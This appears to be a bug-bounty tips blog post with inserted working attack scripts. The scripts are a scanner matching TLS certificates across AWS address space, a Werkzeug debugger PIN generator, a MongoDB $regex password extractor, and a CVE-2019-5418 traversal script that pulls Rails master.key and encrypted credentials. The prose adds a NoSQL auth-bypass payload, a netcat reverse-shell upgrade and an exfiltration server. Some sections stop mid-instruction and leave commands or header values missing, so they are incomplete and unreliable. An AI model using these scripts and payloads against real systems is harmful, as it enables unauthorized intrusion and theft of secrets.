How To Scan AWS's Entire IP Range to Recon SSL Certificates

Naffy (nnwakelam) shared a creative way to extend a target's attack surface in his recent nahamsec interview: scan Amazon AWS's entire IPv4 address space and match the SSL/TLS certificates it serves back to your target's hostnames. Many companies and governments, rather than standing up assets on their own IP blocks (the prefixes announced under their ASNs), increasingly rely on cloud services such as Amazon AWS and Microsoft Azure to host production and development assets. With public cloud infrastructure fast becoming the norm, reconnaissance that only covers an organization's own network ranges with tools like Nmap or Shodan will miss many of those assets.
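The matching half of that approach, as an added example (this is not Naffy's or the post's code). It assumes AWS's published prefix list at https://ip-ranges.amazonaws.com/ip-ranges.json, whose shape is reproduced in a constructed, truncated sample below; the target domains and the fake certificate used for the offline check are also constructed. The handshake helper keeps CA verification on so getpeercert() returns a parsed dict, which means self-signed hosts come back as misses, and because no SNI name is sent you get each IP's default certificate.

```python
"""Added example: match TLS certificates served from AWS address space to a target's hostnames."""
import ipaddress
import json
import socket
import ssl

# Constructed sample in the shape of ip-ranges.json (the real file has thousands of prefixes).
SAMPLE_IP_RANGES = json.dumps({
    "syncToken": "0",
    "prefixes": [
        {"ip_prefix": "203.0.113.0/29", "region": "us-east-1", "service": "EC2"},
        {"ip_prefix": "203.0.113.8/30", "region": "us-east-1", "service": "AMAZON"},
        {"ip_prefix": "198.51.100.0/30", "region": "eu-west-1", "service": "EC2"},
    ],
})

def aws_prefixes(ip_ranges_json, services=("EC2",)):
    """IPv4 networks for the given AWS services (EC2 is where customer-run hosts live)."""
    doc = json.loads(ip_ranges_json)
    return [ipaddress.ip_network(p["ip_prefix"])
            for p in doc["prefixes"] if p["service"] in services]

def hosts_to_scan(networks):
    """Expand networks into individual host addresses (network/broadcast excluded)."""
    return [str(h) for net in networks for h in net.hosts()]

def cert_names(peercert):
    """Collect the CN and DNS SANs from the dict ssl.SSLSocket.getpeercert() returns."""
    names = set()
    for rdn in peercert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                names.add(value.lower())
    for kind, value in peercert.get("subjectAltName", ()):
        if kind == "DNS":
            names.add(value.lower())
    return names

def matches_target(name, target_domains):
    """True if a cert name is the target domain, a subdomain of it, or a wildcard covering one."""
    if name.startswith("*."):
        name = name[2:]
    return any(name == d.lower() or name.endswith("." + d.lower()) for d in target_domains)

def grab_cert(ip, port=443, timeout=3.0):
    """TLS handshake with hostname checking off; returns the getpeercert() dict or None.
    CA verification stays on so the dict is populated; self-signed hosts return None.
    No server_hostname is passed, so the server answers with its default certificate."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    try:
        with socket.create_connection((ip, port), timeout=timeout) as raw:
            with ctx.wrap_socket(raw) as tls:
                return tls.getpeercert()
    except (OSError, ssl.SSLError):
        return None

def find_target_hosts(ips, target_domains, grab=grab_cert):
    """Map ip -> sorted matching cert names. `grab` is injectable so the logic runs offline."""
    hits = {}
    for ip in ips:
        cert = grab(ip)
        if not cert:
            continue
        matched = {n for n in cert_names(cert) if matches_target(n, target_domains)}
        if matched:
            hits[ip] = sorted(matched)
    return hits

if __name__ == "__main__":
    nets = aws_prefixes(SAMPLE_IP_RANGES)
    print(len(hosts_to_scan(nets)), "hosts to scan")
    print(find_target_hosts(hosts_to_scan(nets), ["example.com"]))
```

Against the real prefix list this is millions of hosts, so run it across many worker processes and keep the timeout short; the match logic is the part that rarely changes, which is why it is separated from the network call.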

OneForAll, A Powerful Chinese Subdomain Enumeration Tool

OneForAll is a Chinese recon tool for enumerating subdomains. Chances are you already use OWASP Amass as your primary subdomain enumeration tool, but unlike most cases of tool overlap, OneForAll is a practical supplement that gives you an extra edge because of its Chinese context. It pulls from a multitude of Chinese data sources that other tools typically do not query, among them FOFA, Baidu Cloud Observation, Gitee, and ChinaZ Alexa.

Werkzeug Console PIN Exploit

Force a debug error page in the app to see Werkzeug's "console locked" message: "The console is locked and needs to be unlocked by entering the PIN. You can find the PIN printed out on the standard output of your shell that runs the server." The Werkzeug debug console itself sits at vulnerable-site.com/console, but it is locked behind that secret PIN. The PIN is not random, so you can reproduce the algorithm that generates it: inspect get_pin_and_cookie_name in Werkzeug's debug/__init__.py. It hashes a handful of values that are fixed per host (the server's username, the app's module and class name, the module's file path, the MAC address and the machine id), which is why a file-read bug on the same box usually hands you the PIN.
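A re-implementation of that derivation, added here as an example (it is not the post's code, and it is a rewrite of the logic in Werkzeug's debug/__init__.py rather than the library itself). The inputs are passed explicitly so it runs on an attacker box; on the victim they come from getpass.getuser(), the Flask app's __module__ and class name, that module's __file__, str(uuid.getnode()) and Werkzeug's machine id (read from /etc/machine-id or /proc/sys/kernel/random/boot_id, with the container's cgroup id appended on recent versions). Werkzeug 2.x hashes with sha1; older releases used md5, so try both. The sample values in SAMPLE_INPUTS are constructed.

```python
"""Added example: reproduce Werkzeug's debugger PIN and cookie name from the values it hashes."""
import hashlib
from itertools import chain

# Constructed sample: username, app module, app name, module file, MAC as decimal, machine id.
SAMPLE_INPUTS = (
    "www-data",
    "flask.app",
    "Flask",
    "/usr/local/lib/python3.8/site-packages/flask/app.py",
    "345052369456",
    "d4e6cb65d59544f3331ea0425dc555a1",
)

def werkzeug_pin(username, modname, appname, modfile, mac_decimal, machine_id, algo="sha1"):
    """Return (pin, cookie_name) the way get_pin_and_cookie_name derives them.

    algo is "sha1" for Werkzeug 2.x and "md5" for older releases."""
    probably_public_bits = [username, modname, appname, modfile]
    private_bits = [mac_decimal, machine_id]
    h = hashlib.new(algo)
    for bit in chain(probably_public_bits, private_bits):
        if not bit:                       # missing values are skipped, not hashed as empty
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")
    cookie_name = "__wzd" + h.hexdigest()[:20]   # name of the auth cookie set after unlock
    h.update(b"pinsalt")                          # the PIN continues from the same hash state
    num = ("%09d" % int(h.hexdigest(), 16))[:9]
    for group_size in (5, 4, 3):                  # 9 digits always ends up as 3-3-3
        if len(num) % group_size == 0:
            pin = "-".join(num[x:x + group_size].rjust(group_size, "0")
                           for x in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name

if __name__ == "__main__":
    for algo in ("sha1", "md5"):
        print(algo, *werkzeug_pin(*SAMPLE_INPUTS, algo=algo))
```

The MAC must be the decimal form of uuid.getnode() (the integer, not the colon-separated string), and the module path must match the victim's interpreter exactly; either of those being off by one character gives a different PIN. If WERKZEUG_DEBUG_PIN is set in the server's environment the PIN is taken from there instead and this derivation does not apply.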

Upgrade Default Reverse Shell to Fully Interactive Shell

After catching a reverse shell with a netcat listener (e.g. nc -lvp 6969), the default "dumb shell" is non-interactive: it cannot pass special keyboard input such as tab autocomplete, backspace or arrow keys, and Ctrl-C kills your listener rather than the remote command. To upgrade the dumb shell to a fully interactive one, first run this Python command in it to get a partially interactive shell backed by a pty: python -c 'import pty;pty.spawn("/bin/bash");' Then press Ctrl-Z in your terminal to background netcat. Now, with netcat backgrounded, change your local terminal's line settings to raw mode and tell it to pass keyboard shortcuts through:

Bruteforce MongoDB Credentials with Regex Match Payload

If a login form is vulnerable to NoSQL injection, try bypassing authentication with a payload such as username[$ne]=foo&password[$ne]=foo. Explicit login credentials may still be required for deeper system access, though. When this injection exists, a regex-matching payload ($regex in place of $ne) can also enumerate the full plaintext password one character at a time, provided the application compares the submitted password against a stored plaintext value inside the query; properly hashed passwords cannot be recovered this way. Here is a Go script to bruteforce admin credentials on a login form that uses MongoDB as a backend. In this example, the script assumes the application returns a distinct HTTP response code, 302, when the password regex matches.
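The extraction loop in Python, added as an example; it is not the Go script the post refers to. The vulnerable application is simulated in-process by MockLogin with the semantics the post assumes: the parsed form body is used directly as the query filter, so password[$regex]=^prefix becomes {"password": {"$regex": "^prefix"}}, and a match answers 302. The user records are constructed. For a real target, replace MockLogin.post with the HTTP request (a body like username=admin&password%5B%24regex%5D=%5Eab, which Express's qs parser turns into that nested object) and return the status code.

```python
"""Added example: recover a MongoDB-stored plaintext password through a $regex oracle."""
import re
import string

class MockLogin:
    """Stand-in for the vulnerable app; constructed users, not real data."""
    def __init__(self, users):
        self.users = users                       # username -> plaintext password

    def post(self, form):
        """Mimics db.users.findOne({username: form.username, password: form.password})."""
        stored = self.users.get(form.get("username"))
        pw = form.get("password")
        if stored is None:
            return 401
        if isinstance(pw, dict) and "$regex" in pw:
            return 302 if re.search(pw["$regex"], stored) else 401
        return 302 if pw == stored else 401

ALPHABET = string.ascii_letters + string.digits + string.punctuation

def login_matches(target, username, regex):
    """The oracle: True when the server answers 302 for this regex."""
    return target.post({"username": username, "password": {"$regex": regex}}) == 302

def extract_password(target, username, alphabet=ALPHABET, max_len=64):
    """Grow the known prefix one character at a time using ^prefix<c> as the probe."""
    if not login_matches(target, username, "^"):      # "^" matches anything: is the oracle there?
        raise ValueError("no regex oracle for this user (wrong user, or passwords are hashed)")
    known = ""
    for _ in range(max_len):
        # ^known$ only matches once the whole password has been recovered
        if login_matches(target, username, "^" + re.escape(known) + "$"):
            return known
        for c in alphabet:
            # re.escape keeps '.', '*', '$' and friends from acting as regex metacharacters
            if login_matches(target, username, "^" + re.escape(known + c)):
                known += c
                break
        else:
            raise ValueError("no character matched at position %d; extend the alphabet" % len(known))
    raise ValueError("password longer than max_len")

if __name__ == "__main__":
    target = MockLogin({"admin": "s3cr3t.P@ss"})
    print(extract_password(target, "admin"))
```

The cost is at most len(alphabet) requests per character, so order the alphabet by likelihood (lowercase and digits first) and add a delay if the target rate-limits logins. The final ^known$ probe matters: without it, a password that is a prefix of a longer string would be reported early.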

Expose & Decrypt Ruby on Rails credentials.yml.enc

Ruby on Rails is vulnerable to a critical information disclosure through the "Accept" header (CVE-2019-5418), which can leak the Rails app's secret credentials via directory traversal. To expose the master key and the encrypted credentials, first find a path in the Rails app that uses the render file: method; typically a 404 page implements this to render the view. Read more about the root cause of this vulnerability from chybeta. Using Burp Suite Repeater or a curl request, test the vulnerability by setting the header value to Accept: .
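A probe for that route and a helper for the files it yields, added as an example (not the post's or chybeta's code). It uses the public proof-of-concept form of the Accept value for CVE-2019-5418: "../" repeated until the filesystem root is reached, the target path, then "{{", which terminates the glob pattern Rails builds from the format list. The host, route and traversal depth are illustrative; reading config/master.key through /proc/self/cwd assumes the Rails process runs with the app root as its working directory, which is the usual deployment but not guaranteed.

```python
"""Added example: CVE-2019-5418 Accept-header traversal against a `render file:` route."""
import base64
import http.client

def traversal_accept(path, depth=8):
    """Accept header value: climb `depth` directories, then the target path, then '{{'."""
    return "../" * depth + path.lstrip("/") + "{{"

def fetch_via_accept(host, route, path, port=443, depth=8, https=True):
    """GET `route` with the malicious Accept header; returns (status, body_text)."""
    conn_cls = http.client.HTTPSConnection if https else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=10)
    try:
        conn.request("GET", route, headers={"Accept": traversal_accept(path, depth)})
        resp = conn.getresponse()
        return resp.status, resp.read().decode("utf-8", "replace")
    finally:
        conn.close()

def looks_like_traversal_hit(body):
    """Heuristic used on the /etc/passwd probe before going after the Rails config."""
    return "root:x:0:0:" in body or "root:*:0:0:" in body

# /proc/self/cwd is resolved by the Rails process itself, normally to the app root.
RAILS_FILES = ("proc/self/cwd/config/master.key", "proc/self/cwd/config/credentials.yml.enc")

def split_credentials_enc(blob):
    """credentials.yml.enc is ActiveSupport::MessageEncryptor output for aes-128-gcm:
    base64(ciphertext)--base64(iv)--base64(auth_tag). Returns the three byte strings."""
    parts = blob.strip().split("--")
    if len(parts) != 3:
        raise ValueError("expected ciphertext--iv--auth_tag, got %d parts" % len(parts))
    ciphertext, iv, tag = (base64.b64decode(p) for p in parts)
    return ciphertext, iv, tag

if __name__ == "__main__":
    host, route = "vulnerable-site.com", "/nonexistent-page"     # illustrative
    status, body = fetch_via_accept(host, route, "etc/passwd")
    print(status, "traversal works" if looks_like_traversal_hit(body) else "no hit")
    if looks_like_traversal_hit(body):
        for path in RAILS_FILES:
            status, body = fetch_via_accept(host, route, path)
            print(path, status, body[:80])
```

Once both files are in hand, the simplest way to decrypt is to drop them into the config/ directory of a throwaway Rails app of the same major version and run bin/rails credentials:show (or pass the key as RAILS_MASTER_KEY); the split helper is there for doing it by hand, since the master key is the 16-byte AES key written as 32 hex characters and the file is AES-128-GCM with those three fields.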

Serving PoC Exploits with an HTTP Attack Server

Quickly serve your exploit files with http-party's Node.js-based http-server. After testing several different HTTP server scripts, this one fits my use case best. It is easy to deploy (no installation), actively maintained on GitHub, and provides live verbose logging of incoming requests. The logging is especially useful when you need to exfiltrate data from the victim. How to deploy: on your machine/VPS, cd into the directory containing the file(s) you want to serve.